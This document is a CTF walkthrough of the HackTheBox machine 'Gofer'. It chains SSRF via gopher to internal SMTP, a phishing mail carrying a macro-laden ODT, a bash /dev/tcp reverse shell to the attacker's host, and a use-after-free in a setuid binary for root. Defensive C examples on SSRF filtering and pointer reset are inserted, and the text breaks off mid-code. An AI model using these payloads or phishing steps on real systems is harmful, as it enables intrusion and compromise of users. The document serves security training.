[HTB] gofer


Preface

Couldn't be bothered to write one.

Information gathering

nmap

$ sudo nmap -p- --min-rate=10000 10.10.11.225
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-04 02:22 EDT
Nmap scan report for 10.10.11.225
Host is up (0.075s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp filtered smtp
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 11.06 seconds

$ sudo nmap -sT -sV -sC -O -p22,25,80,139,445 10.10.11.225
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-04 02:24 EDT
Nmap scan report for 10.10.11.225
Host is up (0.074s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 aa:25:82:6e:b8:04:b6:a9:a9:5e:1a:91:f0:94:51:dd (RSA)
| 256 18:21:ba:a7:dc:e4:4f:60:d7:81:03:9a:5d:c2:e5:96 (ECDSA)
|_ 256 a4:2d:0d:45:13:2a:9e:7f:86:7a:f6:f7:78:bc:42:d9 (ED25519)
25/tcp filtered smtp
80/tcp open http Apache httpd 2.4.56
|_http-title: Did not follow redirect to http://gofer.htb/
|_http-server-header: Apache/2.4.56 (Debian)
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linnux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: gofer.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time:
| date: 2023-08-04T06:24:34
|_ start_date: N/A
|_nbstat: NetBIOS name: GOFER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: 10s

OS and Service detection performed. Please report any incorrect results at https://nmap.or
Nmap done: 1 IP address (1 host up) scanned in 27.81 seconds

$ sudo nmap --script=vuln 10.10.11.225
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-04 02:26 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for gofer.htb (10.10.11.225)
Host is up (0.078s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp filtered smtp
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=gofer.htb
| Found the following possible CSRF vulnerabilities:
|
| Path: http://gofer.htb:80/
| Form id:
| Form action:
|
| Path: http://gofer.htb:80/index.html
| Form id:
|_ Form action:
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: ERROR: Server returned less datsing); aborting [9]
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: ERROR: Server returned lare missing); aborting [9]

Nmap done: 1 IP address (1 host up) scanned in 89.27 seconds

Port 25 is filtered, probably by a firewall or something similar. Port 80 is open and worth a look, and the SMB service on 139 and 445 is definitely the first thing to check. So that is the rough path.

whatweb

$ sudo whatweb 10.10.11.225
[sudo] password for meamea:
http://10.10.11.225 [301 Moved Permanently] Apache[2.4.56], Country[RESERVED][ZZ], HTTPSer1.225], RedirectLocation[http://gofer.htb/], Title[301 Moved Permanently]
ERROR Opening: http://gofer.htb/ - no address for gofer.htb

$ sudo vim /etc/hosts

$ sudo whatweb http://gofer.htb
http://gofer.htb [200 OK] Apache[2.4.56], Bootstrap, Country[RESERVED][ZZ], Email[info@gofe/2.4.56 (Debian)], IP[10.10.11.225], Lightbox, Script, Title[Gofer]

We add the domain name to /etc/hosts.

nikto

$ sudo nikto -h http://gofer.htb
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.11.225
+ Target Hostname: gofer.htb
+ Target Port: 80
+ Start Time: 2023-08-04 02:26:53 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.56 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.ms
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to rendthe MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/m
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 72c4, size: 5fa663in/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: OPTIONS, HEAD, GET, POST .
+ 7962 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2023-08-04 02:37:23 (GMT-4) (630 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nothing useful.

SMB

$ smbmap -H 10.10.11.225
[+] IP: 10.10.11.225:445 Name: gofer.htb
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
shares READ ONLY
IPC$ NO ACCESS IPC Service (Samba 4.13.13-Debian)

First use smbmap to list which directories are shared and which of them are accessible. We find that shares is readable, so we connect to it directly.

$ smbclient \\\\10.10.11.225\\shares
Password for [WORKGROUP\me]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Oct 28 15:32:08 2022
.. D 0 Fri Apr 28 07:59:34 2023
.backup DH 0 Thu Apr 27 08:49:32 2023

5061888 blocks of size 1024. 2164028 blocks available
smb: \> cd .backup\
smb: \.backup\> ls
. D 0 Thu Apr 27 08:49:32 2023
.. D 0 Fri Oct 28 15:32:08 2022
mail N 1101 Thu Apr 27 08:49:32 2023

5061888 blocks of size 1024. 2164008 blocks available
smb: \.backup\> get mail
getting file \.backup\mail of size 1101 as mail (3.6 KiloBytes/sec) (average 3.6 KiloBytes/sec)
smb: \.backup\> exit

We find there is a mail file; download it and look at the contents.

From jdavis@gofer.htb  Fri Oct 28 20:29:30 2022
Return-Path: <jdavis@gofer.htb>
X-Original-To: tbuckley@gofer.htb
Delivered-To: tbuckley@gofer.htb
Received: from gofer.htb (localhost [127.0.0.1])
by gofer.htb (Postfix) with SMTP id C8F7461827
for <tbuckley@gofer.htb>; Fri, 28 Oct 2022 20:28:43 +0100 (BST)
Subject:Important to read!
Message-Id: <20221028192857.C8F7461827@gofer.htb>
Date: Fri, 28 Oct 2022 20:28:43 +0100 (BST)
From: jdavis@gofer.htb

Hello guys,

Our dear Jocelyn received another phishing attempt last week and his habit of clicking on links without paying much attention may be problematic one day. From now on, I've decided that important documents will only be sent internally, by mail, which should greatly limit the risks. If possible, use an .odt forma saved in Office Word are not always well interpreted by Libreoffice.

PS: Last thing for Tom; I know you're working on our web proxy but if you could restrict access, it will be more secure until you have finished it. It seet should be possible to do so via <Limit>

In short, the mail has several noteworthy points:

  1. Jocelyn recently received another phishing email, and she (I'm just going to assume the gender) has a habit of clicking links carelessly.
  2. From now on, files will be sent internally by mail, preferably in .odt format.
  3. Tom is working on a web proxy, and its access restrictions may not be particularly strict.
  4. The names in the mail may all be usernames; keep them in mind, e.g. tbuckley, jdavis, Jocelyn, Tom.

The web proxy in point 3 hints that a subdomain may exist; whether the other information is useful we don't know yet. Let's move on.

Web

Visiting the site

Looking around the site turned up nothing useful, so let's do a directory scan and fuzz for subdomains.

Directory scanning

$ sudo feroxbuster -u http://gofer.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x odt -n

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://gofer.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [odt]
🏁 HTTP methods │ [GET]
🚫 Do Not Recurse │ true
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 271c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 81l 197w 2590c http://gofer.htb/assets/vendor/php-email-form/validate.js
200 GET 7l 27w 3309c http://gofer.htb/assets/img/apple-touch-icon.png
200 GET 621l 2087w 29380c http://gofer.htb/index.html
200 GET 237l 526w 5700c http://gofer.htb/assets/js/main.js
200 GET 9l 23w 847c http://gofer.htb/assets/img/favicon.png
200 GET 90l 527w 40608c http://gofer.htb/assets/img/testimonials/testimonials-5.jpg
200 GET 130l 463w 27174c http://gofer.htb/assets/img/portfolio/portfolio-8.jpg
200 GET 1l 233w 13749c http://gofer.htb/assets/vendor/glightbox/css/glightbox.min.css
200 GET 88l 408w 36465c http://gofer.htb/assets/img/testimonials/testimonials-4.jpg
200 GET 13l 171w 16468c http://gofer.htb/assets/vendor/swiper/swiper-bundle.min.css
200 GET 261l 1188w 94694c http://gofer.htb/assets/img/about-img.jpg
200 GET 259l 1656w 147504c http://gofer.htb/assets/img/portfolio/portfolio-5.jpg
200 GET 187l 991w 87460c http://gofer.htb/assets/img/team/team-4.jpg
200 GET 1l 133w 68028c http://gofer.htb/assets/vendor/boxicons/css/boxicons.min.css
200 GET 369l 2025w 164200c http://gofer.htb/assets/img/team/team-2.jpg
200 GET 147l 628w 44741c http://gofer.htb/assets/img/portfolio/portfolio-6.jpg
200 GET 1535l 3031w 26660c http://gofer.htb/assets/css/style.css
200 GET 14l 1684w 143629c http://gofer.htb/assets/vendor/swiper/swiper-bundle.min.js
200 GET 1l 313w 14690c http://gofer.htb/assets/vendor/aos/aos.js
301 GET 9l 28w 307c http://gofer.htb/assets => http://gofer.htb/assets/
200 GET 160l 818w 71959c http://gofer.htb/assets/img/testimonials/testimonials-1.jpg
200 GET 1l 625w 55880c http://gofer.htb/assets/vendor/glightbox/js/glightbox.min.js
200 GET 148l 914w 83895c http://gofer.htb/assets/img/portfolio/portfolio-2.jpg
200 GET 246l 1284w 100163c http://gofer.htb/assets/img/portfolio/portfolio-3.jpg
200 GET 345l 1897w 135739c http://gofer.htb/assets/img/portfolio/portfolio-1.jpg
200 GET 7l 2189w 194901c http://gofer.htb/assets/vendor/bootstrap/css/bootstrap.min.css
200 GET 316l 1853w 153340c http://gofer.htb/assets/img/team/team-1.jpg
200 GET 247l 1374w 99927c http://gofer.htb/assets/img/team/team-3.jpg
200 GET 71l 380w 30729c http://gofer.htb/assets/img/testimonials/testimonials-3.jpg
200 GET 1l 218w 26053c http://gofer.htb/assets/vendor/aos/aos.css
200 GET 488l 2828w 220492c http://gofer.htb/assets/img/portfolio/portfolio-7.jpg
200 GET 244l 1332w 103224c http://gofer.htb/assets/img/testimonials/testimonials-2.jpg
200 GET 120l 567w 48988c http://gofer.htb/assets/img/portfolio/portfolio-4.jpg
200 GET 12l 557w 35445c http://gofer.htb/assets/vendor/isotope-layout/isotope.pkgd.min.js
200 GET 1876l 9310w 88585c http://gofer.htb/assets/vendor/bootstrap-icons/bootstrap-icons.css
200 GET 238l 1343w 105633c http://gofer.htb/assets/img/portfolio/portfolio-9.jpg
200 GET 7l 1223w 80496c http://gofer.htb/assets/vendor/bootstrap/js/bootstrap.bundle.min.js
200 GET 621l 2087w 29380c http://gofer.htb/
[####################] - 12m 220605/220605 0s found:38 errors:7
[####################] - 12m 220546/220546 318/s http://gofer.htb/

Nothing useful found.

Subdomain fuzzing

$ wfuzz -H "Host: FUZZ.gofer.htb" --hc 404,403 --hw 28 -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt http://gofer.htb
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://gofer.htb/
Total requests: 4989

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000084: 401 14 L 54 W 462 Ch "proxy"

Total time: 40.14814
Processed Requests: 4989
Filtered Requests: 4988
Requests/sec.: 124.2647

This proxy is most likely the web proxy Tom is building. Add it to hosts and visit it.

proxy

Let's take a look.

It immediately asks us to log in. A quick try of weak passwords with the usernames found earlier got nowhere. Then I remembered the mail said the access restriction was poorly done. A poorly done access restriction can easily become a Maginot Line: strict control applied to only one request method, with nothing applied to the others.

Let's try other request methods.

However, they all returned 401 Unauthorized. Let's try accessing a page directly instead; Wappalyzer shows the site is written in PHP.

So let's try the default page, index.php.

Sure enough, it returns 200, bypassing the authorization, but it reports that the url parameter is missing. Let's add one and see.

We try http://proxy.gofer.htb/index.php?url=127.0.0.1 directly.

Well, it returned the web homepage from port 80 straight away. A textbook SSRF vulnerability.

Exploiting the SSRF

Now that we've confirmed the SSRF exists, let's get straight to using it. curl is more convenient; continuing with Firefox is fine too.

$ curl proxy.gofer.htb/index.php?url=file:///etc/passwd -X POST
<!-- Welcome to Gofer proxy -->
<html><body>Blacklisted keyword: file:// !</body></html>

I wanted to try LFI, but the file protocol is clearly filtered. Other commonly used protocols include gopher, dict, http and so on. Then it hit me: isn't this box called gofer? A hint that we should use the gopher protocol? The gopher protocol is mainly used to send GET and POST requests and to attack internal applications.

Do we need to attack an internal application? The filtered SMTP on port 25, of course. SMTP is clearly only usable internally, and conveniently the SSRF lets us have the server send mail on the inside on our behalf. Recalling the mail content, it's time to go phishing for Jocelyn, who loves to click links.

Building the phishing email

Searching for "ssrf smtp gopher" brings up a pile of exploitation tutorials; some related material: hacktricks, github. Alternatively we can use the Gopherus tool to generate the payload.

$ gopherus --exploit smtp


________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/

author: $_SpyD3r_$


Give Details to send mail:

Mail from : jdavis@gofer.htb
Mail To : jocelyn@gofer.htb
Subject : Important!
Message : <a href="http://<HTB_VPN_IP>:19198/door.sh">read</a>

Your gopher link is ready to send Mail:

gopher://127.0.0.1:25/_MAIL%20FROM:jdavis%40gofer.htb%0ARCPT%20To:jocelyn%40gofer.htb%0ADATA%0AFrom:jdavis%40gofer.htb%0ASubject:Important%21%0AMessage:%3Ca%20href%3D%22http://<HTB_VPN_IP>:19198/door.sh%22%3Eread%3C/a%3E%0A.

If you use this payload directly you'll find that /127 is also blacklisted. Fortunately there are many ways of bypassing local-address checks in SSRF; we can use the decimal form of the address, 2130706433, which also represents 127.0.0.1.

The content of door.sh is just a reverse shell command: /bin/bash -i >& /dev/tcp/<HTB_VPN_IP>/11451 0>&1

The payload then has to be URL-encoded, otherwise nothing happens.

Let's try it.
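Both filter failures seen so far (file:// blocked by keyword, /127 blocked by keyword, the decimal form slipping through) come from matching strings in the raw URL instead of deciding on the address the proxy would actually connect to. The following is an added defensive example, not the proxy's code: naive_blacklisted reproduces a substring filter of the kind the proxy's error messages suggest (an assumption about its implementation), and proxy_url_allowed is the check I would put in its place: allowlist the scheme, canonicalise the host with inet_aton/getaddrinfo so that 2130706433, 0x7f000001 and 0177.0.0.1 all collapse to 127.0.0.1, and refuse every loopback, private and link-local destination. Function names are mine.

```c
/* Added defensive example (not the proxy's code): a substring blacklist of
   the kind the proxy's error messages suggest, beside an allowlist-plus-
   address check that is not fooled by alternative spellings of 127.0.0.1. */
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <stdint.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>

/* Filter inferred (assumption) from "Blacklisted keyword: file://" and the
   blocked "/127": a string match over the raw URL. 1 = blocked. */
int naive_blacklisted(const char *url)
{
    return strstr(url, "file://") != NULL || strstr(url, "/127") != NULL;
}

/* IPv4 address in host byte order: is it a range an outbound proxy must
   never reach on a user's behalf? */
int ipv4_is_internal(uint32_t ip)
{
    unsigned a = ip >> 24, b = (ip >> 16) & 0xff;
    return a == 127                          /* loopback, where 25/tcp listens */
        || a == 10                           /* RFC 1918 */
        || (a == 172 && b >= 16 && b <= 31)
        || (a == 192 && b == 168)
        || (a == 169 && b == 254)            /* link-local, cloud metadata */
        || a == 0;                           /* 0.0.0.0 reaches the local host too */
}

/* The same question for an address returned by getaddrinfo(). */
int sockaddr_is_internal(const struct sockaddr *sa)
{
    if (sa->sa_family == AF_INET) {
        const struct sockaddr_in *s4 = (const struct sockaddr_in *)sa;
        return ipv4_is_internal(ntohl(s4->sin_addr.s_addr));
    }
    if (sa->sa_family == AF_INET6) {
        const struct in6_addr *a6 = &((const struct sockaddr_in6 *)sa)->sin6_addr;
        if (IN6_IS_ADDR_LOOPBACK(a6) || IN6_IS_ADDR_LINKLOCAL(a6) || IN6_IS_ADDR_UNSPECIFIED(a6))
            return 1;
        if (IN6_IS_ADDR_V4MAPPED(a6)) {      /* ::ffff:127.0.0.1 */
            uint32_t v4;
            memcpy(&v4, &a6->s6_addr[12], 4);
            return ipv4_is_internal(ntohl(v4));
        }
        return 0;
    }
    return 1;                                /* unknown family: refuse */
}

/* Copy the host of scheme://host[:port][/path] into buf (IPv6 brackets stripped). */
static int url_host(const char *url, char *buf, size_t n)
{
    const char *p = strstr(url, "://");
    size_t len;
    if (!p)
        return -1;
    p += 3;
    if (*p == '[') {
        const char *e = strchr(++p, ']');
        if (!e)
            return -1;
        len = (size_t)(e - p);
    } else {
        len = strcspn(p, ":/?#");
    }
    if (len == 0 || len >= n)
        return -1;
    memcpy(buf, p, len);
    buf[len] = '\0';
    return 0;
}

/* Hardened check: allowlist the scheme, then canonicalise the host and test
   every address it maps to. 1 = the proxy may fetch this URL. */
int proxy_url_allowed(const char *url)
{
    char host[256];
    struct in_addr v4;
    struct addrinfo hints, *res, *ai;
    int ok = 1;

    if (strncasecmp(url, "http://", 7) != 0 && strncasecmp(url, "https://", 8) != 0)
        return 0;                            /* gopher://, file://, dict://: never */
    if (url_host(url, host, sizeof host) != 0)
        return 0;
    /* inet_aton() accepts every classic numeric spelling, so "2130706433",
       "0x7f000001" and "0177.0.0.1" all become 127.0.0.1 before the range test. */
    if (inet_aton(host, &v4))
        return !ipv4_is_internal(ntohl(v4.s_addr));
    /* Hostname or IPv6 literal: resolve and check each result. */
    memset(&hints, 0, sizeof hints);
    hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo(host, NULL, &hints, &res) != 0)
        return 0;                            /* unresolvable: refuse */
    for (ai = res; ai; ai = ai->ai_next)
        if (sockaddr_is_internal(ai->ai_addr)) { ok = 0; break; }
    freeaddrinfo(res);
    return ok;
}
```

Two caveats a practitioner would add: the proxy must connect to the address it checked (not resolve the name a second time, which reopens the door to DNS rebinding), and the check has to be repeated on every redirect the fetched server returns. The authentication in front of the proxy is a separate layer; the index.php bypass above shows it was not covering every path and method.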

$ curl proxy.gofer.htb/index.php?url=gopher%3A%2F%2F2130706433%3A25%2F_MAIL%2520FROM%3Atest%2540test.htb%250ARCPT%2520To%3Ajocelyn%2540gofer.htb%250ADATA%250AFrom%3Ajdavis%2540gofer.htb%250ASubject%3AImportant%2521%250AMessage%3A%253Ca%2520href%253D%2522http%3A%2F%2F<HTB_VPN_IP>%3A19198%2Fdoor.sh%2522%253Eread%253C%2Fa%253E%250A. -X POST
<!-- Welcome to Gofer proxy -->
220 gofer.htb ESMTP Postfix (Debian/GNU)
250 2.1.0 Ok
550 5.1.1 <jocelyn@gofer.htb>: Recipient address rejected: User unknown in local recipient table
554 5.5.1 Error: no valid recipients
221 2.7.0 Error: I can break rules, too. Goodbye.

It says there is no valid recipient. What? Isn't she called jocelyn? Looking again at the first mail, the sender is jdavis; let's check the website to see whether that is really his name.

Damn, it's an abbreviation. Tom Buckley's username is indeed tbuckley, so Jocelyn Hudson's username should be jhudson. Change it and try again.

$ curl proxy.gofer.htb/index.php?url=gopher%3A%2F%2F2130706433%3A25%2F_MAIL%2520FROM%3Ajdavis%2540gofer.htb%250ARCPT%2520To%3Ajhudson%2540gofer.htb%250ADATA%250AFrom%3Ajdavis%2540gofer.htb%250ASubject%3AImportant%2521%250AMessage%3A%253Ca%2520href%253D%2522http%3A%2F%2F<HTB_VPN_IP>%3A19198%2Fdoor.sh%2522%253Eread%253C%2Fa%253E%250A. -X POST

We start an HTTP server locally and listen on a port with nc. We then find that Jocelyn did click the link, but no reverse shell came back. There may be a restriction; combined with the earlier mail, they may only open .odt files sent by mail.

Building the malicious ODT file

I first tried a file built with msf's exploit/multi/fileformat/libreoffice_macro_exec, but no matter what I could not get a shell from it; I don't know what went wrong.

Searching a bit more, I found an article describing in detail how to build a malicious odt file by hand.

Steps:

  1. Open LibreOffice and choose Tools -> Macros -> Organize Macros -> Basic.

  2. Build the reverse shell with the Shell() function as in the article, although there is no need to split it into three steps the way the article does. Also note that it must be wrapped in bash -c, otherwise no shell comes back; annoying.

  3. Once the macro is written, go to Customize and assign the macro to run automatically when the document is opened.

  4. Save. Done.

Getting a foothold

$ curl -X POST proxy.gofer.htb/index.php?url=gopher%3A%2F%2F2130706433%3A25%2F_MAIL%2520FROM%3Ajdavis%2540gofer.htb%250ARCPT%2520To%3Ajhudson%2540gofer.htb%250ADATA%250AFrom%3Ajdavis%2540gofer.htb%250ASubject%3AImportant%250AMessage%3A%253Ca%2520href%253D%2522%2520http%3A%2F%2F<HTB_VPN_IP>%3A19198%2Fexp.odt%2520%2522%253Eread%253C%2Fa%253E%250A.
$ python -m http.server 19198
Serving HTTP on 0.0.0.0 port 19198 (http://0.0.0.0:19198/) ...
10.10.11.225 - - [04/Aug/2023 13:28:50] "GET /exp.odt HTTP/1.1" 200 -
$ sudo nc -nlvp 11451
listening on [any] 11451 ...
connect to [<HTB_VPN_IP>] from (UNKNOWN) [10.10.11.225] 34542
bash: cannot set terminal process group (4974): Inappropriate ioctl for device
bash: no job control in this shell
bash: /home/jhudson/.bashrc: Permission denied
jhudson@gofer:/usr/bin$

Success; the user flag is in the home directory.

Privilege escalation

Gathering information with pspy64

sudo is unavailable.

Searching for setuid binaries does turn up something.

jhudson@gofer:/usr/bin$ find / -type f -perm -04000 2>/dev/null
find / -type f -perm -04000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/passwd
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/su
/usr/bin/chfn
/usr/bin/newgrp
/usr/local/bin/notes
You have mail in /var/mail/jhudson
jhudson@gofer:/usr/bin$ ls -la /usr/local/bin/notes
ls -la /usr/local/bin/notes
-rwsr-s--- 1 root dev 17168 Apr 28 16:06 /usr/local/bin/notes
jhudson@gofer:/usr/bin$ id
id
uid=1000(jhudson) gid=1000(jhudson) groups=1000(jhudson),108(netdev)

But jhudson is not in the dev group, so we cannot examine this notes binary. Let's see whether we can find a way to escalate to a user in the dev group.

crontab has nothing interesting either.

Routine stuff: run pspy64 and linpeas.

After waiting a while, pspy64 reported good news: a set of login credentials for tbuckley. Not sure whether they are valid, but let's just try logging in over ssh; it works. Win!

$ ssh tbuckley@10.10.11.225
tbuckley@10.10.11.225's password:
Linux gofer.htb 5.10.0-23-amd64 #1 SMP Debian 5.10.179-2 (2023-07-14) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have no mail.
tbuckley@gofer:~$ id
uid=1002(tbuckley) gid=1002(tbuckley) groups=1002(tbuckley),1004(dev)

As luck would have it, tbuckley is in the dev group, so we can go straight to examining notes.

Reversing notes

Let's run it first.

tbuckley@gofer:/usr/local/bin$ ls -la
total 28
drwxr-xr-x 2 root root 4096 Apr 28 16:06 .
drwxr-xr-x 10 root root 4096 Oct 28 2022 ..
-rwsr-s--- 1 root dev 17168 Apr 28 16:06 notes
tbuckley@gofer:/usr/local/bin$ ./notes
========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice:

It looks like a note-taking program, and testing it confirms that.

Let's throw the program into IDA and look at its overall flow.

int __cdecl main(int argc, const char **argv, const char **envp)
{
char *v3; // rax
int v5; // [rsp+Ch] [rbp-14h] BYREF
void *ptr; // [rsp+10h] [rbp-10h]
void *s; // [rsp+18h] [rbp-8h]

v5 = 0;
s = 0LL;
ptr = 0LL;
while ( 1 )
{
puts(
"========================================\n"
"1) Create an user and choose an username\n"
"2) Show user information\n"
"3) Delete an user\n"
"4) Write a note\n"
"5) Show a note\n"
"6) Save a note (not yet implemented)\n"
"7) Delete a note\n"
"8) Backup notes\n"
"9) Quit\n"
"========================================\n"
"\n");
printf("Your choice: ");
__isoc99_scanf("%d", &v5);
puts(&byte_212E);
switch ( v5 )
{
case 1:
s = malloc(0x28uLL);
if ( !s )
exit(-1);
memset(s, 0, 0x18uLL);
memset((char *)s + 24, 0, 0x10uLL);
if ( getuid() )
{
*((_DWORD *)s + 6) = 'resu';
}
else
{
v3 = (char *)s + 24;
*((_DWORD *)s + 6) = 'imda';
v3[4] = 'n';
}
printf("Choose an username: ");
__isoc99_scanf("%23s", s);
puts(&byte_212E);
continue;
case 2:
if ( !s )
goto LABEL_11;
printf("\nUsername: %s\n", (const char *)s);
printf("Role: %s\n\n", (const char *)s + 24);
break;
case 3:
if ( s )
free(s);
continue;
case 4:
ptr = malloc(0x28uLL);
memset(ptr, 0, 0x28uLL);
if ( !ptr )
exit(-1);
puts("Write your note:");
__isoc99_scanf("%39s", ptr);
continue;
case 5:
printf("Note: %s\n\n", (const char *)ptr);
continue;
case 6:
puts("Coming soon!\n");
continue;
case 7:
if ( ptr )
{
free(ptr);
ptr = 0LL;
}
continue;
case 8:
if ( s )
{
if ( !strcmp((const char *)s + 24, "admin") )
{
puts("Access granted!");
setuid(0);
setgid(0);
system("tar -czvf /root/backups/backup_notes.tar.gz /opt/notes");
}
else
{
puts("Access denied: you don't have the admin role!\n");
}
}
else
{
LABEL_11:
puts("First create an user!\n");
}
break;
default:
exit(0);
}
}
}

First we can see that case 8 runs a command with root privileges. That makes our mouth water; if only we could bypass the identity check in front of it.

Looking more closely, in case 3 (delete user) the memory is only freed and the pointer is not set to zero. If we look at case 7 (delete note), we see the correct flow: after free, the pointer should be set to zero, otherwise problems arise. Let's hear what MacArthur (ChatGPT) has to say:

[screenshot: ChatGPT's explanation]

Clearly this leaves a dangling pointer. How do we exploit it?

In case 1, creating a user allocates a 0x28 (40-byte) chunk s; in case 8 the identity check tests whether the bytes of s starting at offset 24 are "admin". Case 4 likewise allocates a 40-byte chunk, and since the chunk was freed but s was not zeroed, the new note will very likely land at the address s still points to.

Putting this analysis together, we can exploit it like this:

1. Create any user -> 2. Delete the user, leaving a dangling pointer -> 3. Write a note: fill the first 24 bytes with an arbitrary username, then "admin" as the role -> 4. Run option 8, which now passes the identity check.
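To show what the missing pointer reset changes, here is an added example (not the binary from the box) that replays the create-user, delete-user, write-note, check-role sequence from the decompiled main() in plain C. vulnerable_flow keeps the stale pointer exactly as case 3 does; fixed_flow deletes through a double pointer and clears it, which is what case 7 already does for notes. The chunk reuse that makes the first flow succeed is glibc tcache behaviour for back-to-back allocations of one size class; function and macro names are mine.

```c
/* Added example, not the binary from the box: the create-user / delete-user /
   write-note sequence from the decompiled main(), with and without the
   pointer reset that stops a note from being read back as the user record. */
#include <stdlib.h>
#include <string.h>

#define REC_SIZE 0x28   /* both the user record and a note are 40 bytes */
#define ROLE_OFF 24     /* role string starts at offset 24 of the user record */

/* Option 1: username at offset 0, role "user" for any non-root caller. */
char *create_user(const char *name)
{
    char *s = malloc(REC_SIZE);
    if (!s)
        exit(1);
    memset(s, 0, REC_SIZE);
    strncpy(s + ROLE_OFF, "user", REC_SIZE - ROLE_OFF - 1);
    strncpy(s, name, 23);
    return s;
}

/* Option 4: same size class, so the allocator may hand back the chunk a
   freed user record occupied (glibc's tcache does so for the very next
   allocation of that size). */
char *write_note(const char *text)
{
    char *p = malloc(REC_SIZE);
    if (!p)
        exit(1);
    memset(p, 0, REC_SIZE);
    strncpy(p, text, REC_SIZE - 1);
    return p;
}

/* Option 8's gate, as decompiled: a NULL check, then strcmp on the role. */
int is_admin(const char *s)
{
    return s != NULL && strcmp(s + ROLE_OFF, "admin") == 0;
}

/* The note used in the write-up: 24 filler bytes, then "admin" at offset 24. */
static void forged_note(char *buf)
{
    memset(buf, 'x', ROLE_OFF);
    strcpy(buf + ROLE_OFF, "admin");
}

/* Vulnerable: option 3 frees the record but leaves s pointing at it.
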